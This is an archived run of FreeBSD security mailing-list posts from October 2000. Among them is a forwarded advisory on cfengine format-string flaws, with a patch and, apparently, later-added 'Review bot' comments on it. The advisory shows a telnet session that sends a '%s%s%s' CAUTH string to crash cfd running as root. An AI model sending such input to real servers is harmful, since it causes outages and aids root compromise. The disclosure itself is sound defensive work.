Received: (from str@localhost) by giganda.komkon.org (8.9.3/8.9.3) id RAA56369; Sun, 1 Oct 2000 17:09:22 -0400 (EDT) (envelope-from str)
Date: Sun, 1 Oct 2000 17:09:22 -0400 (EDT)
From: Igor Roshchin
Message-Id: <200010012109.RAA56369@giganda.komkon.org>
To: kris@FreeBSD.org
Subject: Re: advisory suggestion
Cc: security@FreeBSD.org
In-Reply-To: <20001001012524.B9499@freefall.freebsd.org>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Date: Sun, 1 Oct 2000 01:25:24 -0700
> From: Kris Kennaway
> Subject: Re: advisory suggestion
>
> On Sat, Sep 30, 2000 at 10:12:38PM -0400, Igor Roshchin wrote:
>
> > Affects: FreeBSD.....
> > ... including 3.5.1-RELEASE
>
> I thought I was doing that already..I always try and specifically
> mention which releases were and were not vulnerable to the problem in
> question.

Yes, it is usually well done!
You probably forgot about these additional "technical" releases (x.x.1)
(which are not even mentioned on www.Freebsd.org)

> > Corrected: ....
> > (including 4.1.1-RELEASE [and later])
>
> Isn't it pretty obvious that once we fix a problem, it stays fixed,
> and so if 4.1 is fixed then 4.1.1, 4.2, 4.3, 4.4, 4.4.145 (I predict a
> serious problem with that release ;-), etc are all going to be fixed?
> :-)

"and later" was put in the square brackets because it was obvious :)
The point was in "including 4.1.1-RELEASE"
It makes it convenient to mention explicitly the releases that are out at
the time when the advisory is issued.
In this case, it was written that 4.1-STABLE is fixed as of xx.xx.2000
It's clear that it is fixed in 4.2-RELEASE (whenever it's out), but not
clear about 4.1.1-RELEASE (you need to compare the dates)

Igor

From owner-freebsd-security Sun Oct 1 14:11:22 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0F50237B503; Sun, 1 Oct 2000 14:11:21 -0700 (PDT)
Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA39188; Sun, 1 Oct 2000 14:11:21 -0700 (PDT) (envelope-from kris@FreeBSD.org)
Date: Sun, 1 Oct 2000 14:11:20 -0700
From: Kris Kennaway
To: Igor Roshchin
Cc: kris@FreeBSD.org, security@FreeBSD.org
Subject: Re: advisory suggestion
Message-ID: <20001001141120.A37225@freefall.freebsd.org>
References: <20001001012524.B9499@freefall.freebsd.org> <200010012109.RAA56369@giganda.komkon.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200010012109.RAA56369@giganda.komkon.org>; from str@giganda.komkon.org on Sun, Oct 01, 2000 at 05:09:22PM -0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sun, Oct 01, 2000 at 05:09:22PM -0400, Igor Roshchin wrote:
> In this case, it was written that 4.1-STABLE is fixed as of xx.xx.2000
> It's clear that it is fixed in 4.2-RELEASE (whenever it's out), but not
> clear about 4.1.1-RELEASE (you need to compare the dates)
>

Oh, I see what you meant - I forgot to mention this in the most recent
catopen advisory. Sorry - I'll try and remember for the future.

Kris
--
In God we Trust -- all others must submit an X.509 certificate.
-- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 14:33:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D474937B503; Sun, 1 Oct 2000 14:33:25 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA49537; Sun, 1 Oct 2000 14:33:25 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Sun, 1 Oct 2000 14:33:25 -0700 From: Kris Kennaway To: achilov@granch.ru Cc: "Vladimir B. Grebenschikov" , freebsd-security@FreeBSD.ORG Subject: Re: MD5 passwords vs DES Message-ID: <20001001143325.A44714@freefall.freebsd.org> References: <14789.42660.401430.305445@vbook.express.ru> <39D79CF0.D794F732@sentry.granch.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <39D79CF0.D794F732@sentry.granch.ru>; from shelton@sentry.granch.ru on Mon, Oct 02, 2000 at 03:22:08AM +0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Oct 02, 2000 at 03:22:08AM +0700, Rashid N. Achilov wrote: > "Vladimir B. Grebenschikov" wrote: > > > > I have a question: > > > > Does anybody have ideas to add a 'default crypting mode' for utilities > > like passwd, adduser, etc ? > > > > Manually change all users' passwords to MD5, then simply edit the symlink > libcrypt.so.2 (I assume 4.1-RELEASE) to point to libscrypt.so.2 and > libcrypt.a to point to libscrypt.a. Now you can't use DES passwords > until you revert the links, but all newly created users will now have MD5-crypted > passwords This is no longer true as of 4.1.1-RELEASE, although it wasn't documented there. Basically, you control which form users in a particular login class get with the passwd_format login capability, which takes values of "des" or "md5".
This is documented in login_cap(5) in recent 4.1.1-STABLE, and I think Brian was going to add an erratum about it. Of course, you still need to install des-capable libraries to enable des passwords (as before), but it won't magically change the default password format. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 14:40:24 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D009137B503; Sun, 1 Oct 2000 14:40:20 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA52808; Sun, 1 Oct 2000 14:40:20 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Sun, 1 Oct 2000 14:40:20 -0700 From: Kris Kennaway To: Andreas Alderud Cc: security@FreeBSD.ORG Subject: Re: Security and FreeBSD, my overall perspective Message-ID: <20001001144020.B44714@freefall.freebsd.org> References: <002401c02b99$a07a8ab0$6400a8c0@XGod> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5i In-Reply-To: <002401c02b99$a07a8ab0$6400a8c0@XGod>; from aaldv97@student.vxu.se on Sun, Oct 01, 2000 at 01:20:38PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Oct 01, 2000 at 01:20:38PM +0200, Andreas Alderud wrote: > I think it would be wise to have three ports of the ``same´´ package. > My idea is to have lets say -SECURE, -STABLE - and CURRENT (the same could > be done with FreeBSD itself). I don't understand what you're trying to say here. The ports collection isn't branched into -stable and -current versions, and I don't see any real benefits to doing that. It should work the same with both. 
> The real advantage of this would be if the BSDs would have a unified ports > system, as proposed by Chris Coleman, and incorporate the ideas of Jordan's > paper on the future package system. [...] This doesn't sound relevant to the current FreeBSD ports collection - if OpenPackages want to stratify their ports collection, they can do what they like :-) Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 15: 3:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from green.dyndns.org (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 0479937B503; Sun, 1 Oct 2000 15:03:13 -0700 (PDT) Received: from localhost (hu0wi9@localhost [127.0.0.1] (may be forged)) by green.dyndns.org (8.11.0/8.11.0) with ESMTP id e91LsB550028; Sun, 1 Oct 2000 17:56:10 -0400 (EDT) (envelope-from green@FreeBSD.org) Message-Id: <200010012156.e91LsB550028@green.dyndns.org> X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 To: achilov@granch.ru Cc: "Vladimir B. Grebenschikov" , freebsd-security@FreeBSD.org Subject: Re: MD5 passwords vs DES In-Reply-To: Message from "Rashid N. Achilov" of "Mon, 02 Oct 2000 03:22:08 +0700." <39D79CF0.D794F732@sentry.granch.ru> From: "Brian F. Feldman" Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sun, 01 Oct 2000 17:54:10 -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Rashid N. Achilov" wrote: > "Vladimir B. Grebenschikov" wrote: > > > > I have a question: > > > > Does anybody have ideas to add a 'default crypting mode' for utilities > > like passwd, adduser, etc ? > > > > Manually change all users' passwords to MD5, then simply edit the symlink > libcrypt.so.2 (I assume 4.1-RELEASE) to point to libscrypt.so.2 and > libcrypt.a to point to libscrypt.a.
> Now you can't use DES passwords > until you revert the links, but all newly created users will now have MD5-crypted > passwords Nah, the functionality's already there. Your passwords will default to md5, or whatever is specified in /etc/login.conf as passwd_format. This is 4.1.1-RELEASE and onward. -- Brian Fundakowski Feldman \ FreeBSD: The Power to Serve! / green@FreeBSD.org `------------------------------' To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 18:38:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from smtp6.mindspring.com (smtp6.mindspring.com [207.69.200.110]) by hub.freebsd.org (Postfix) with ESMTP id E2E3E37B503 for ; Sun, 1 Oct 2000 18:38:32 -0700 (PDT) Received: from p4f0i0 (user-2iniio2.dialup.mindspring.com [165.121.75.2]) by smtp6.mindspring.com (8.9.3/8.8.5) with SMTP id VAA05416 for ; Sun, 1 Oct 2000 21:38:31 -0400 (EDT) Message-ID: <003801c02c11$924d9cc0$024b79a5@p4f0i0> From: "Jonathan M. Slivko" To: Subject: Finally, silence! Date: Sun, 1 Oct 2000 21:39:13 -0400 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0035_01C02BF0.0A6AF120" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Finally, there is some silence on the list. Thank God! ;)
----------------------------------------------------------------------------
Jonathan M. Slivko, President / Founder
Linux Mafia Internet Services
Phone: (212) 663-1109 / Pager: (917) 388-5304
Webpage: http://www.linux-mafia.net
AIM SN: OptixNYC
Network Solutions Handle: JSR730
----------------------------------------------------------------------------
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 21:28:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 4B66E37B503; Sun, 1 Oct 2000 21:28:43 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Sun, 1 Oct 2000 21:25:13 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id e924QJ959567; Sun, 1 Oct 2000 21:26:19 -0700 (PDT) (envelope-from cjc) Date: Sun, 1 Oct 2000 21:26:18 -0700 From: "Crist J . Clark" To: Kris Kennaway Cc: achilov@granch.ru, "Vladimir B. Grebenschikov" , freebsd-security@FreeBSD.ORG Subject: Re: MD5 passwords vs DES Message-ID: <20001001212618.M25121@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <14789.42660.401430.305445@vbook.express.ru> <39D79CF0.D794F732@sentry.granch.ru> <20001001143325.A44714@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20001001143325.A44714@freefall.freebsd.org>; from kris@FreeBSD.ORG on Sun, Oct 01, 2000 at 02:33:25PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Oct 01, 2000 at 02:33:25PM -0700, Kris Kennaway wrote: [snip] > This is documented in login_cap(5) in recent > 4.1.1-STABLE... Whoa, whoa. Please, tell me there is no such thing as 4.1.1-STABLE. ITYM, 4.1-STABLE after the freeze of 4.1.1-RELEASE, Kris? I don't believe there are, and there better not be, separate 4.1-STABLE and 4.1.1-STABLE branches. -- Crist J.
Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 21:30:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 72E2237B502; Sun, 1 Oct 2000 21:30:35 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA42981; Sun, 1 Oct 2000 21:30:35 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Sun, 1 Oct 2000 21:30:35 -0700 From: Kris Kennaway To: cjclark@alum.mit.edu Cc: Kris Kennaway , achilov@granch.ru, "Vladimir B. Grebenschikov" , freebsd-security@FreeBSD.ORG Subject: Re: MD5 passwords vs DES Message-ID: <20001001213034.A42302@freefall.freebsd.org> References: <14789.42660.401430.305445@vbook.express.ru> <39D79CF0.D794F732@sentry.granch.ru> <20001001143325.A44714@freefall.freebsd.org> <20001001212618.M25121@149.211.6.64.reflexcom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001001212618.M25121@149.211.6.64.reflexcom.com>; from cjclark@reflexnet.net on Sun, Oct 01, 2000 at 09:26:18PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Oct 01, 2000 at 09:26:18PM -0700, Crist J . Clark wrote: > On Sun, Oct 01, 2000 at 02:33:25PM -0700, Kris Kennaway wrote: > > [snip] > > > This is documented in login_cap(5) in recent > > 4.1.1-STABLE... > > Whoa, whoa. Please, tell me there is no such thing as 4.1.1-STABLE. > > ITYM, 4.1-STABLE after the freeze of 4.1.1-RELEASE, Kris? I don't > believe there are, and there better not be, separate 4.1-STABLE and > 4.1.1-STABLE branches. 4.1.1-STABLE means "the RELENG_4 branch after the release of the 4.1.1-RELEASE snapshot". Kris -- In God we Trust -- all others must submit an X.509 certificate. 
-- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 1 23:58:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from netcore.fi (netcore.fi [193.94.160.1]) by hub.freebsd.org (Postfix) with ESMTP id 79E7C37B503 for ; Sun, 1 Oct 2000 23:58:39 -0700 (PDT) Received: from localhost (pekkas@localhost) by netcore.fi (8.11.0/8.11.0) with ESMTP id e926wVQ14145 for ; Mon, 2 Oct 2000 09:58:33 +0300 Date: Mon, 2 Oct 2000 09:58:31 +0300 (EEST) From: Pekka Savola To: security@freebsd.org Subject: Very probable remote root vulnerability in cfengine (fwd) Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/Mixed; BOUNDARY="1589707168-1171649858-970422716=:9658" Content-ID: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Hi,

I was unable to reproduce this in FreeBSD (ports cfengine), but you might still want to take a look -- I find it probable this may be exploitable some other way.

-- 
Pekka Savola                 "Tell me of difficulties surmounted,
Pekka.Savola@netcore.fi       not those you stumble over and fall"

---------- Forwarded message ----------
Date: Mon, 2 Oct 2000 09:56:30 +0300 (EEST)
From: Pekka Savola
To: bugtraq@securityfocus.com
Subject: Very probable remote root vulnerability in cfengine

PROBLEM:
--------

cfd daemon in GNU CFEngine ( http://www.iu.hioslo.no/cfengine/ ) contains several format string vulnerabilities in syslog() calls. Everyone, or if access controls are being used, accepted hosts, can inject the network daemon with a message causing a segmentation fault. As cfd is almost always run as root due to its nature (centralized configuration management etc.), this can be quite lethal and lead to a root compromise.

AUTHOR INTERACTION:
-------------------

Notified the author on 1st Oct 2000 and worked with him. A different fix was applied to the newly released 1.6.0.a11 (alpha version). I got the impression that there isn't going to be an official fix for 1.5.x releases.

VERSIONS AND PLATFORMS AFFECTED:
--------------------------------

Every recent version except 1.6.0a11 released on 1st Oct 2000.

1.5.x and 1.6.0a10 were tested on Red Hat Linux; however, this is not part of Red Hat Linux or Powertools. Debian, at least, includes cfengine as a package. I briefly tried to reproduce this on FreeBSD 3.4 or 4.1 -- no luck; I wouldn't be surprised if it was exploitable some way or the other though.

Not tested on other non-Linux platforms, but if you run cfd I suggest you check it out no matter the platform.

DETAILS:
--------

If access controls are used (this is not the default) in cfd.conf or equivalent, the attacker must have access to an allowed system first. Spoofing would probably also yield similar results; the fact that there need not be any reply from the server makes it easier.

Segmentation fault can be induced as follows:
-----
$ telnet cfdserver 5308
Trying x.y.z.w...
Connected to cfdserver.some.domain.
Escape character is '^]'.
CAUTH 1.1.1.1 myhostname root %s%s%s%s%s%s%s%s
^]
telnet> quit
Connection closed.
-----

where 1.1.1.1 is your IP address and myhostname is some resolvable hostname. A longer string of %s's can also be used if that doesn't produce good results.

If the %s string is not long enough, a string like the following will be syslogged; this doesn't look good:
-----
cfdserver cfd[11330]: Reverse hostname lookup failed, host claiming to be 1.1.1.1 myhostname root cfdserver.some.domain(null)1.1.1.1 nev^M was 1.1.1.1 s%s%s^M ^Aû½^QÀØÀôü¿0¼^D^HÀj ^Húì¿^Hý¿Àj
-----

In the end, cfd dies in a segmentation fault.

As you can set %s%s%s freely, and it's passed almost without checking as-is to syslog(), it shouldn't be too difficult for Joe Hacker to exploit this.

Also, other components of cfengine use the same logging functions, so a local root exploit could also be possible, but those aren't as interesting as this and will be fixed at the same time.

EXPLOIT:
--------

Not my business; I'm sure someone will produce one sooner or later though.

WORKAROUND:
-----------

Enable access controls in cfd.conf and/or firewall off TCP port 5308. These can't be considered _good_ workarounds as users in the local network/legit hosts can still exploit the service.

PATCH:
------

"Standard" patch to syslog calls included. It applies quite cleanly to both 1.5.x and 1.6.0aXX.

CREDITS:
--------

The vulnerability was found by Pekka Savola while doing a minor audit on cfengine in the light of format string vulnerabilities.
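Review bot: in hunk @@ -71,12 +71,12 @@ of the attached cfengine-1.6.0.a10-syslog.patch (src/log.c), the replacement `syslog(LOG_ERR,"%s",string,VFQNAME);` closes the format-string hole but keeps VFQNAME as a trailing argument that the new "%s" format never consumes, so if `string` was built with a %s placeholder for the host name, that name is now dropped and a literal "%s" is logged instead; either remove the dead argument or make the host name explicit, e.g. `syslog(LOG_ERR, "%s: %s", VFQNAME, string);`. The same applies to the errstr and strerror lines in this hunk.

Review bot: in hunk @@ -110,11 +110,11 @@ the unchanged guard `if ((errstr == NULL) || (strlen(errstr) > 0))` still lets the patched `syslog(LOG_ERR,"%s",errstr,VFQNAME);` run with errstr == NULL, which hands a null pointer to %s (undefined behaviour; glibc prints "(null)", other C libraries may crash). The test reads as inverted; suggest `if (errstr != NULL && strlen(errstr) > 0)` so the fix does not trade a format-string bug for a null dereference.

Review bot: in hunk @@ -125,7 +125,7 @@ the trailing context line `if (string[strlen(string)-1] != '\n')` reads string[-1] when string is empty; since this hunk already touches the surrounding block, guard it with `strlen(string) > 0 &&` before the index.

Review bot: in hunk @@ -141,8 +141,8 @@ (and likewise in @@ -71) `syslog(LOG_ERR,"%s",strerror(errno),VFQNAME);` is evaluated after the preceding `syslog(LOG_ERR,"%s",errstr,VFQNAME);`, and syslog(3) itself may change errno when it opens or writes the log socket, so the second line can report an unrelated error; save errno into a local (`int saved_errno = errno;`) before the first syslog call and log strerror(saved_errno).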
-- 
Pekka Savola                 "Tell me of difficulties surmounted,
Pekka.Savola@netcore.fi       not those you stumble over and fall"

[Attachment: cfengine-1.6.0.a10-syslog.patch, text/plain; sent base64-encoded, decoded here]

diff -uNr cfengine-1.6.0.a10.orig/src/log.c cfengine-1.6.0.a10/src/log.c
--- cfengine-1.6.0.a10.orig/src/log.c	Wed Sep  6 14:43:03 2000
+++ cfengine-1.6.0.a10/src/log.c	Sun Oct  1 20:09:09 2000
@@ -71,12 +71,12 @@
 		     
 		     if (LOGGING && IsPrivileged())
 			{
-			syslog(LOG_ERR,string,VFQNAME);
+			syslog(LOG_ERR,"%s",string,VFQNAME);
 
 			if (strlen(errstr) != 0)
 			   {
-			   syslog(LOG_ERR,errstr,VFQNAME);
-			   syslog(LOG_ERR,strerror(errno),VFQNAME);
+			   syslog(LOG_ERR,"%s",errstr,VFQNAME);
+			   syslog(LOG_ERR,"%s",strerror(errno),VFQNAME);
 			   }
 			}
                      break;
@@ -110,11 +110,11 @@
    case cflogonly:
                      if (LOGGING && IsPrivileged())
 			{
-			syslog(LOG_INFO,string,VFQNAME);
+			syslog(LOG_INFO,"%s",string,VFQNAME);
 			
 			if ((errstr == NULL) || (strlen(errstr) > 0))
 			   {
-			   syslog(LOG_ERR,errstr,VFQNAME);
+			   syslog(LOG_ERR,"%s",errstr,VFQNAME);
 			   }
 			}
 		     
@@ -125,7 +125,7 @@
 
 		     if (LOGGING && IsPrivileged())
 			{
-			syslog(LOG_ERR,string,VFQNAME);
+			syslog(LOG_ERR,"%s",string,VFQNAME);
 			}
  
 		     if (string[strlen(string)-1] != '\n')
@@ -141,8 +141,8 @@
 			
 			if (LOGGING && IsPrivileged())
 			   {
-			   syslog(LOG_ERR,errstr,VFQNAME);
-			   syslog(LOG_ERR,strerror(errno),VFQNAME);
+			   syslog(LOG_ERR,"%s",errstr,VFQNAME);
+			   syslog(LOG_ERR,"%s",strerror(errno),VFQNAME);
 			   }
                         }
 		     return;

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 0: 7:32 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.vxu.se (oxeln.vxu.se [194.47.65.30]) by hub.freebsd.org (Postfix) with ESMTP id 0BD2337B503 for ; Mon, 2 Oct 2000 00:07:29 -0700 (PDT) Received: from XGod ([194.47.111.20]) by mail.vxu.se (Netscape Messaging Server 4.15) with SMTP id G1SJSF00.L7Z for ; Mon, 2 Oct 2000 09:07:27 +0200 Message-ID: <001101c02c3f$754a76b0$6400a8c0@XGod> From: "Andreas Alderud" To: Subject: Re: Security and FreeBSD, my overall perspective Date: Mon, 2 Oct 2000 09:07:42 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: >> I think it would be wise to have three ports of the ``same´´ package. >> My idea is to have let's say -SECURE, -STABLE - and CURRENT (the same could >> be done with FreeBSD itself). > >I don't understand what you're trying to say here. The ports >collection isn't branched into -stable and -current versions, and I >don't see any real benefits to doing that. It should work the same with both. I know, but that was not what I meant.
I want ported applications, where possible and/or needed, to have -SECURE, -STABLE and -CURRENT version tags. Some people don't want to run the current version of the software; they want to build and run the latest stable version, but in most cases it is no longer available, as with the Blackbox WM port for example. The latest stable version of Blackbox is 0.51.3.1 but the only version available in FreeBSD 4.1.1 is 0.61.0. If we stretch this argument further: I, as an OpenBSD user, like the fact that in the version I run, i.e. 2.6, they still use bind4 because it's not only proven stable, but also secure. Therefore it should be possible to have a quite a bit larger tree of ports, without almost any extra work, that pleases everybody from security freaks to people who like to stand firmly on the ground but be quite up to date, and the people who like to live on the bleeding edge. I'm sure this could be done with FreeBSD itself: once a -SECURE version, of let's say 4.1.1, is available it would only be updated for security fixes, not the feature patches that the -STABLE version now enjoys. Same thing here, wouldn't take that much extra effort. >> The real advantage of this would be if the BSDs would have a unified ports >> system, as proposed by Chris Coleman, and incorporate the ideas of Jordan's >> paper on the future package system. [...] > >This doesn't sound relevant to the current FreeBSD ports collection - >if OpenPackages want to stratify their ports collection, they can do >what they like :-) Yep, but it's time to update the package system. http://people.freebsd.org/~jkh/package-and-install.txt /Kind regards, David A.
Alderud To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 10:17:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from libertad.univalle.edu.co (libertad.univalle.edu.co [216.6.69.11]) by hub.freebsd.org (Postfix) with ESMTP id ECE4A37B66E for ; Mon, 2 Oct 2000 10:14:49 -0700 (PDT) Received: from localhost (buliwyf@localhost) by libertad.univalle.edu.co (8.10.0/8.10.0) with ESMTP id e92HIvh84928 for ; Mon, 2 Oct 2000 12:18:58 -0500 (COT) Date: Mon, 2 Oct 2000 12:18:57 -0500 (COT) From: Buliwyf McGraw To: security@FreeBSD.ORG Subject: NATD and ipf Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello... I have a question for you: When I'm doing NATD for an intranet, using ipf and ipnat... do I need to use special rules for the ftp service??? I mean, from my subnet with invalid IPs I can access all services on the Internet; everything BUT not ftp. Why could that be??? Thanks for any help.
======================================================================= Buliwyf McGraw Administrator of the Libertad Server Information Services Center Universidad del Valle ======================================================================= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 10:46:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.rpi.edu (mail.rpi.edu [128.113.100.7]) by hub.freebsd.org (Postfix) with ESMTP id 4185A37B502; Mon, 2 Oct 2000 10:46:10 -0700 (PDT) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail.rpi.edu (8.9.3/8.9.3) with ESMTP id NAA239228; Mon, 2 Oct 2000 13:45:48 -0400 Mime-Version: 1.0 X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: <200009302123.PAA13609@harmony.village.org> References: <008b01c02a71$6b8938c0$d04379a5@p4f0i0> <200009292349.TAA07263@giganda.komkon.org> <200009302123.PAA13609@harmony.village.org> Date: Mon, 2 Oct 2000 13:45:46 -0400 To: Warner Losh , "Jonathan M. Slivko" From: Garance A Drosihn Subject: Re: cvs commit: ports/mail/pine4 Makefile (fwd) Cc: "Igor Roshchin" , kris@FreeBSD.ORG, roman@xpert.com, security@FreeBSD.ORG Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 3:23 PM -0600 9/30/00, Warner Losh wrote: > "Jonathan M. Slivko" writes: >: it. Especially some of the addons are extremely helpful. If you ask >: my opinion, let pine stay in its normal state and leave the security >: and the management of the machines that run it to the systems >: administrators, where the responsibilities lie in the first place. >: Doesn't everyone agree with me on that? > >I think I disagree. I do think pine should be in a "different state" of some sort, given that we are very suspicious about the code.
>Maybe we need a category that is "This program may be insecure, set >INSECURE_OK in your /etc/make.conf if you don't have a problem with >that" for ports. I would suggest that some per-port switch might be better, so one can say "Yes, my users pretty much force me to have 'pine' available", without that also changing the status for all other ports which would be in this category. disclaimer: I'm not offering to do any work, of course, I'm just suggesting things for whoever IS willing to do the work... :-) --- Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu Senior Systems Programmer or drosih@rpi.edu Rensselaer Polytechnic Institute To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 11: 8:20 2000 Delivered-To: freebsd-security@freebsd.org Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id A79EA37B502 for ; Mon, 2 Oct 2000 11:03:47 -0700 (PDT) Received: from algroup.co.uk ([193.195.56.225]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id RAA04978; Mon, 2 Oct 2000 17:59:21 GMT Message-ID: <39D8CCF8.85E7C655@algroup.co.uk> Date: Mon, 02 Oct 2000 18:59:20 +0100 From: Adam Laurie Organization: A.L. Group plc X-Mailer: Mozilla 4.72 [en] (Win95; U) X-Accept-Language: en MIME-Version: 1.0 To: Buliwyf McGraw Cc: security@FreeBSD.ORG Subject: Re: NATD and ipf References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Buliwyf McGraw wrote: > > Hello... I have a question for you: > > When I'm doing NATD for an intranet, using ipf and ipnat... do I need to use > special rules for the ftp service??? > I mean, from my subnet with invalid IPs I can access all services on the > Internet; everything BUT not ftp. > Why could that be???
